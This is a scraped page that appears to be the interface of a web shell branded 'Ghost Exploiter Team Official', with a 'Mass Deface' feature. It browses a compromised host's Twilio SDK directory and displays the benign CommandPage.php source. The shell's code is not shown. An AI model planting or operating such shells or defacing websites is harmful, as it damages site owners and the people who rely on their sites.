webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
Rest
/
Wireless
/
V1
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Sim
--
ren
CommandContext.php
1.734KB
edt
ren
CommandInstance.php
4KB
edt
ren
CommandList.php
6.139KB
edt
ren
CommandOptions.php
9.131KB
edt
ren
CommandPage.php
1.124KB
edt
ren
RatePlanContext.php
2.406KB
edt
ren
RatePlanInstance.php
4.968KB
edt
ren
RatePlanList.php
5.954KB
edt
ren
RatePlanOptions.php
14.31KB
edt
ren
RatePlanPage.php
1.13KB
edt
ren
SimContext.php
5.163KB
edt
ren
SimInstance.php
6.043KB
edt
ren
SimList.php
4.998KB
edt
ren
SimOptions.php
19.198KB
edt
ren
SimPage.php
1.101KB
edt
ren
UsageRecordInstance.php
1.864KB
edt
ren
UsageRecordList.php
4.872KB
edt
ren
UsageRecordOptions.php
3.234KB
edt
ren
UsageRecordPage.php
1.147KB
edt
ren
<?php /** * This code was generated by * \ / _ _ _| _ _ * | (_)\/(_)(_|\/| |(/_ v1.0.0 * / / */ namespace Twilio\Rest\Wireless\V1; use Twilio\Http\Response; use Twilio\Page; use Twilio\Version; class CommandPage extends Page { /** * @param Version $version Version that contains the resource * @param Response $response Response from the API * @param array $solution The context solution */ public function __construct(Version $version, Response $response, array $solution) { parent::__construct($version, $response); // Path Solution $this->solution = $solution; } /** * @param array $payload Payload response from the API * @return CommandInstance \Twilio\Rest\Wireless\V1\CommandInstance */ public function buildInstance(array $payload): CommandInstance { return new CommandInstance($this->version, $payload); } /** * Provide a friendly representation * * @return string Machine friendly representation */ public function __toString(): string { return '[Twilio.Wireless.V1.CommandPage]'; } }